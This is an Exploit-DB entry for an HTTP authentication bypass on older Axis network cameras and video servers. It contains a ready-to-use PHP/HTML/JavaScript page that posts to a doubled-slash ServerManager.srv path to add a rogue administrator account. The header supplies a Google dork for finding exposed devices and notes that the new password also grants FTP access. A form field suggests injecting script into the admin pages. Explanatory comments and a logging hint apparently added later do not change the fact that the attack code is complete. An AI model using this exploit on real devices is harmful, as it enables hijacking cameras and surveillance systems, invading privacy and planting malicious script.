Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass

2004-08-23T00:00:00
ID EDB-ID:24402
Type exploitdb
Reporter bashis
Modified 2004-08-23T00:00:00

Description

Axis Network Camera 2.x And Video Server 1-3 HTTP Authentication Bypass. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/11011/info

A hardcoded backdoor administrative-user issue allows remote attackers to administer affected devices. This likely cannot be disabled.
 
This issue is reported to affect:
- Axis StorePoint CD E100 CD-ROM Server with firmware version 5.30
 
<?php
###########################################################################
#          03/11/2007 | 3:00        #
#    |#|axisNC.php        #
#          |#|Axis Network Camera HTTP Authentication Bypass|#|
#
#                          Exploit:        #
#              plz help as friend to ours new project iam or maroc telecom company #
#                         By  ConcorDHacK and xcoder            #
#                    moroccan-hackers-sabotage.co.ma                      
#
#|    Replace [IP]or[Hostname] with another IP or hostname    #
#          |#|Affected Products|#|       #
#           #
# AXIS 2100 Network Camera versions 2.32 and previous    #
# AXIS 2110 Network Camera versions 2.32 and previous    #
# AXIS 2120 Network Camera versions 2.32 and previous    #
# AXIS 2130 PTZ Network Camera versions 2.32 and previous    #
# AXIS 2400 Video Server versions 2.32 and previous    #
# AXIS 2401 Video Server versions 2.32 and previous    #
# AXIS 2420 Network Camera versions 2.32 and previous    #
# AXIS 2460 Network DVR versions 3.00 and previous    #
# AXIS 250S Video Server versions 3.02 and previous    #
# i know this exploit is old, but what is new: if you add a new password,
# that password also gives you ftp access !!!!!!!!!!!!!!!!!!!!!!!!!          #
#    |#|Google dork : intitle:"Axis 2100 Network Camera" ....       #
#           #
# Runtime settings for the page. The rest of this listing is static HTML and
# client-side JavaScript; no PHP code that opens sockets or runs for a long
# time is visible in it.
# Report no PHP errors at all.
error_reporting(0);
# 0 removes the script execution time limit.
ini_set("max_execution_time",0);
# Default timeout, in seconds, for socket-based streams.
ini_set("default_socket_timeout", 2);
# Flush the output buffer automatically after every output call.
ob_implicit_flush (1);
?>
<style
type="text/css">body{background-color:black; 
SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; color:   red; } img 
{background-color:#FFFFFF}
input  {background-color:black} option{ background-color: black}   
textarea
{background-color: black } input {color: red } option {color: red 
}textarea
{color: red }checkbox{background-color: black }select {font-weight:
normal;
color:
#1CB081;background-color:black;}body{font-size:8pt;background-color:
black;body * {font-size: 8pt } h1 {font-size:0.8em }h2{font-size:0.8em}  
h3
{font-size: 0.8em} h4,h5,h6{font-size:0.8em}h1 font{font-size:0.8em}h2 
font
{font-size:0.8em } h3 font {font-size:  0.8em}h4 font,h5  font,h6      
font
{font-size:  0.8em } *  {font-style:  normal }    *{text-decoration: 
none }
a:link,a:active,a:visited{ text-decoration: none ; color : black; } 
a:hover
{text-decoration: underline;color : black; } .Stile5 {font-family: 
Verdana,
Arial, Helvetica,  sans-serif;  font-size: 10px; }  .Stile6   
{font-family:
Verdana,  Arial,  Helvetica,     sans-serif;font-weight:bold;   
font-style:
italic;}--></style>
<script LANGUAGE="JavaScript">
// Passwords for the entries of the "users" list, held as plain strings and
// indexed by list position; 20 slots, matching the limit enforced in addUser().
var password = Array(20);
/**
 * Encode a password as the decimal UTF-16 code of each character, each code
 * left-padded with zeros to at least three digits, all concatenated
 * (for example "ab" becomes "097098").
 *
 * This is a reversible encoding, not a hash: whoever sees the encoded string
 * can read the password back. Codes above 999 are written unpadded and so
 * come out wider than three digits.
 *
 * @param {string} pwString - password text to encode
 * @returns {string} concatenated decimal character codes
 */
function formatPassword(pwString) {
  var pieces = [];
  for (var pos = 0; pos < pwString.length; pos++) {
    var digits = String(pwString.charCodeAt(pos));
    while (digits.length < 3) {
      digits = "0" + digits;
    }
    pieces.push(digits);
  }
  return pieces.join("");
}
/**
 * Rebuild the "users" list from the colon-separated text held in the hidden
 * conf_Security_List field. Each record is read as
 * name ":" rights ":" encodedPassword ":".
 *
 * The encoded password is cut off and thrown away, never decoded, so every
 * slot of the global `password` array filled here holds the empty string.
 */
function parseUsers() {
  var wizard = document.WizardForm;
  var userList = wizard.users;
  var remaining = wizard.conf_Security_List.value;
  var sep = remaining.indexOf(":");
  var count = 0;

  // Cut the text in front of the current separator off `remaining`, move the
  // separator position to the next ":" and hand back the text that was cut.
  function shiftField() {
    var field = remaining.substr(0, sep);
    remaining = remaining.substr(sep + 1, remaining.length - sep - 1);
    sep = remaining.indexOf(":");
    return field;
  }

  userList.length = 0;
  while (sep != -1) {
    var userName = shiftField();
    var userRights = shiftField();
    shiftField(); // encoded password: skipped, not decoded

    userList.length = userList.length + 1;
    var entry = userList.options[count];
    entry.value = userName;
    // The label shows "name:rights"; the value keeps the bare name.
    entry.text = userRights.length > 0 ? userName + ":" + userRights : userName;
    password[count] = "";
    count++;
  }
}
/**
 * Serialise the "users" list back into the hidden conf_Security_List field.
 *
 * Each entry contributes its label (name, or "name:rights"), a separator, the
 * encoded password and a closing ":". An entry without any right gets "::" so
 * that the empty rights field is still present.
 *
 * Entries whose password slot is the empty string serialise with an empty
 * password field; how the receiving device treats that is not visible here.
 */
function formatUsers() {
  var wizard = document.WizardForm;
  var userList = wizard.users;
  var serialized = "";
  for (var n = 0; n < userList.length; n++) {
    var label = userList.options[n].text;
    var hasRights = isAdmin(n) || isView(n) || isDial(n);
    serialized += label + (hasRights ? ":" : "::") + formatPassword(password[n]) + ":";
  }
  wizard.conf_Security_List.value = serialized;
}
/**
 * Tell whether the rights part of a list entry's label contains a character.
 *
 * The label is "name" or "name:rights" and the option's value is the bare
 * name, so the search starts one position past the name, just after the ":".
 *
 * @param {string} ch - single character to look for
 * @param {number} index - position of the entry in the "users" list
 * @returns {boolean} true when `ch` occurs in the rights part
 */
function contains(ch, index) {
  var entry = document.WizardForm.users.options[index];
  var label = entry.text;
  var nameLength = entry.value.length;
  var labelLength = label.length;

  // Label and name of equal length: the entry carries no rights at all.
  if (nameLength == labelLength) {
    return false;
  }

  var pos = nameLength + 1;
  while (pos < labelLength) {
    if (label.charAt(pos) == ch) {
      return true;
    }
    pos++;
  }
  return false;
}
/**
 * @param {number} index - position of the entry in the "users" list
 * @returns {boolean} true when the entry's rights include "A" (Admin)
 */
function isAdmin(index) {
  var adminFlag = "A";
  return contains(adminFlag, index);
}
/**
 * @param {number} index - position of the entry in the "users" list
 * @returns {boolean} true when the entry's rights include "V" (View)
 */
function isView(index) {
  var viewFlag = "V";
  return contains(viewFlag, index);
}
/**
 * @param {number} index - position of the entry in the "users" list
 * @returns {boolean} true when the entry's rights include "D" (Dial-in)
 */
function isDial(index) {
  var dialFlag = "D";
  return contains(dialFlag, index);
}
/**
 * Copy the currently selected list entry into the edit fields: user name,
 * both password boxes and the three rights checkboxes.
 *
 * The stored password is written back into the password fields as plain text.
 */
function UserChange() {
  var wizard = document.WizardForm;
  var userList = wizard.users;
  var picked = userList.selectedIndex;

  wizard.username.value = userList.options[picked].value;

  // Both boxes receive the same stored value so the pair always agrees.
  wizard.password1.value = password[picked];
  wizard.password2.value = password[picked];

  wizard.checkAdmin.checked = isAdmin(picked);
  wizard.checkDial.checked = isDial(picked);
  wizard.checkView.checked = isView(picked);
}
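/**
 * Remove the selected entry from the "users" list and its password slot,
 * then refresh the edit fields.
 *
 * The entry named exactly "root" is never removed; an alert is shown instead.
 * With nothing selected, the last entry becomes the selection.
 */
function deleteUser() {
  var list = document.WizardForm.users;
  var selected = list.selectedIndex;

  if (selected != -1) {
    // Compare the whole user name (the option's value). Matching only the
    // first four characters of the label would also protect names that
    // merely begin with "root", such as "rooter".
    if (list.options[selected].value == "root") {
      alert("The 'root' user cannot be deleted.");
    } else {
      // Close the gap: move every later entry and its password up one slot.
      for (var i = selected; i < list.length - 1; i++) {
        list.options[i].text = list.options[i + 1].text;
        list.options[i].value = list.options[i + 1].value;
        password[i] = password[i + 1];
      }
      list.length--;
    }
  }

  if (list.selectedIndex == -1) {
    list.selectedIndex = list.length - 1;
  }

  // An empty list has no entry to show; UserChange() would fail on it.
  if (list.length > 0) {
    UserChange();
  }
}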
/**
 * Button handler: add or update the user typed into the edit fields.
 * An empty user name is not skipped here; it goes through addUser()'s checks.
 * The result of addUser() is not returned.
 */
function addUserButton() {
  var ignoreEmptyUser = false;
  addUser(ignoreEmptyUser);
}
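/**
 * Add the user typed into the edit fields to the "users" list, or overwrite
 * the entry that already carries that name.
 *
 * The 20-entry limit applies only when a new entry would be created; an
 * existing entry can still be edited while the list is full.
 *
 * The password is taken from the first password field and kept as plain text
 * in the global `password` array.
 *
 * @param {boolean} ignoreEmptyUser - when true, an empty user name is treated
 *   as "nothing to add" and reported as success
 * @returns {number} 1 on success (or when an empty name was ignored), 0 when
 *   the list is full or one of the check functions rejected the input
 */
function addUser(ignoreEmptyUser) {
  var form = document.WizardForm;
  var list = form.users;
  var index = -1;

  if (ignoreEmptyUser && form.username.value == "") {
    return 1;
  }

  if (list.length == 1 && list.options[0].value == "") {
    // A lone entry with an empty name is a placeholder: reuse it.
    index = 0;
  } else {
    // When several entries share the name, the last one is the one updated.
    for (var i = 0; i < list.length; i++) {
      if (list.options[i].value == form.username.value) {
        index = i;
      }
    }
  }
  var newUser = index == -1;

  // Only a new entry can overflow the list and the 20-slot password array.
  if (newUser && list.length >= 20) {
    alert("It is not possible to add more than 20 users.");
    form.username.select();
    form.username.focus();
    return 0;
  }

  if (!(checkUserName() == 1 && checkPasswords(newUser) == 1 && checkRights() == 1)) {
    return 0;
  }

  if (newUser) {
    index = list.length;
    list.length++;
  }
  list.options[index].value = form.username.value;
  list.options[index].text = form.username.value + strRights();
  password[index] = form.password1.value;

  list.selectedIndex = index;
  return 1;
}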
/** Empty the user name field and both password fields. */
function clearUser() {
  var wizard = document.WizardForm;
  var fields = [wizard.username, wizard.password1, wizard.password2];
  for (var n = 0; n < fields.length; n++) {
    fields[n].value = "";
  }
}
/**
 * Build the rights suffix for a list label from the three checkboxes.
 *
 * @returns {string} ":" followed by the letters A (Admin), D (Dial-in) and
 *   V (View) for each ticked box, in that order; "" when none is ticked
 */
function strRights() {
  var wizard = document.WizardForm;
  var letters = "";
  if (wizard.checkAdmin.checked) {
    letters += "A";
  }
  if (wizard.checkDial.checked) {
    letters += "D";
  }
  if (wizard.checkView.checked) {
    letters += "V";
  }
  return letters == "" ? "" : ":" + letters;
}
/**
 * User name check. The loop steps over every character of the name but tests
 * none of them, so no name is ever rejected.
 *
 * @returns {number} always 1
 */
function checkUserName() {
  var candidate = document.WizardForm.username.value;
  var pos = 0;
  while (pos < candidate.length) {
    candidate.charAt(pos); // read only; nothing is compared
    pos += 1;
  }
  return 1;
}
/**
 * Password check. Both password fields are read, but they are neither
 * compared with each other nor tested against any rule, so a mismatch between
 * the password and its confirmation goes unnoticed.
 *
 * @param {boolean} newUser - whether the entry is being created; not used
 * @returns {number} always 1
 */
function checkPasswords(newUser) {
  var wizard = document.WizardForm;
  var first = wizard.password1.value;
  var second = wizard.password2.value;
  return 1;
}
/**
 * Require at least one of the Admin, Dial-in and View checkboxes to be ticked.
 * When none is, an alert is shown and the Admin checkbox receives the focus.
 *
 * @returns {number} 1 when a right is selected, 0 otherwise
 */
function checkRights() {
  var wizard = document.WizardForm;
  var adminBox = wizard.checkAdmin;
  var dialBox = wizard.checkDial;
  var viewBox = wizard.checkView;

  if (adminBox.checked || dialBox.checked || viewBox.checked) {
    return 1;
  }

  alert("Select User Rights before adding user.");
  adminBox.focus();
  adminBox.select();
  return 0;
}
//-->
</script>
<script LANGUAGE="JavaScript">
<!--
/**
 * Page load handler: fill the "users" list from the hidden
 * conf_Security_List field by calling parseUsers().
 */
function onLoad() {
  parseUsers();
  return;
}
/**
 * Submit handler. Commits whatever is typed in the edit fields through
 * addUser() (an empty user name is skipped), writes the serialised list into
 * conf_Security_List with formatUsers() and submits the form. Nothing is
 * submitted when addUser() reports failure.
 */
function saveData() {
  var wizard = document.WizardForm;
  var ignoreEmptyUser = true;
  if (addUser(ignoreEmptyUser) != 1) {
    return;
  }
  formatUsers();
  wizard.submit();
}
//-->
</script>
</HEAD>
<BODY BGCOLOR="black" LINK="gray" VLINK="gray" ALINK="gray"
ONLOAD="onLoad()">
<TABLE BORDER="0" WIDTH="1100" HEIGHT="400" CELLSPACING="0" 
CELLPADDING="0">
<TR><TD COLSPAN="2">




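<!-- The host is the [IP]or[Hostname] placeholder that the header comment says to substitute, not a fixed third-party address. -->
<!-- NOTE(review): the doubled slash in front of this_server looks deliberate; presumably it is what lets the request skip the device's HTTP authentication check (confirm against the advisory). POST requests to //this_server/ServerManager.srv in web server or proxy logs are worth alerting on. -->
<FORM ACTION="http://[IP]or[Hostname]//this_server/ServerManager.srv"
METHOD="POST" NAME="WizardForm">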




<TABLE BORDER="0" CELLSPACING="0" CELLPADDING="0">
<TR><TD COLSPAN="2">
<INPUT TYPE="hidden" NAME="conf_Security_List" VALUE="root:ADVO::">
<FONT FACE="ARIAL, GENEVA" SIZE="2"><B>A script By ConcorDHacK <br><a 
href="
http://www.hackzord-security.fr.tc"><font color="red"><i><u>[
www.hackzord-security.fr.tc]</a></B></FONT>
</TD><BR><BR></TR><TR><TD COLSPAN="2"><FONT FACE="Arial, Geneva"
SIZE="2"><SELECT NAME="users" SIZE="2" onchange="UserChange()">
<OPTION value="Dummy">WWWWWWWWWW:ADV
</SELECT></FONT></TD><TD></TD><TR><TD 
COLSPAN="2"></TD><TD></TD></TR><TR><TD
COLSPAN="4"><HR></TD></TR><TR><TD><FONT FACE="Arial, Geneva" 
SIZE="2"><b>New
Admin:</FONT></TD>
<TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT name="username" 
type="text"
size="30"> (Ex : ConcorDHacK or just root)</FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva"
SIZE="2"><b>Password:</FONT></TD><TD><FONT FACE="Arial, Geneva"
SIZE="2"><INPUT name="password1" type="password" size="30">
Password of your choice (Ex : 123456 )</FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva" SIZE="2"><b>Verify:</FONT></TD>
<TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT name="password2"
type="password" size="30"> Confirm your password</FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva" 
SIZE="2"><b>Signature:</FONT></TD>
<TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT name="conf_Image_UseText"
type="text" size="30" value=""> Your signature in the administration by
HTML/Javascript code  after "> (Ex : ">
<script>alert("LOL")</script></pre></FONT></TD>
</TR><TR><TD><FONT FACE="Arial, Geneva" SIZE="2"><b>User Rights:
</FONT></TD><TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT 
NAME="checkAdmin"
TYPE="checkbox"><b>Admin
<TR><TD></TD><TD><FONT FACE="Arial, Geneva" SIZE="2"><INPUT 
NAME="checkDial"
TYPE="checkbox"><b> Dial-in </TD></TR></font><TR><TD></TD><TD><FONT
FACE="Arial, Geneva" SIZE="2">
<INPUT NAME="checkView" TYPE="checkbox"><b> View
</TD></TR></FONT></TD></TR><TR><TD COLSPAN="2" ALIGN="center"><br>
<table border="0" cellspacing="1" cellpadding="1"
width="300"bgcolor="#ffffff"><tr><td bgcolor="red" width="20%"
height="16"><center><b><font color="black"><A
HREF="javascript:saveData()">-=[Go!Go!]=-</A></font></td>
</TD></TR></TABLE><INPUT TYPE="HIDDEN" NAME="servermanager_return_page"
VALUE="/admin/setgen/security.shtml">
<INPUT TYPE="HIDDEN" NAME="servermanager_do"
VALUE="set_variables"></FORM></TD></TR></TABLE></BODY></HTML>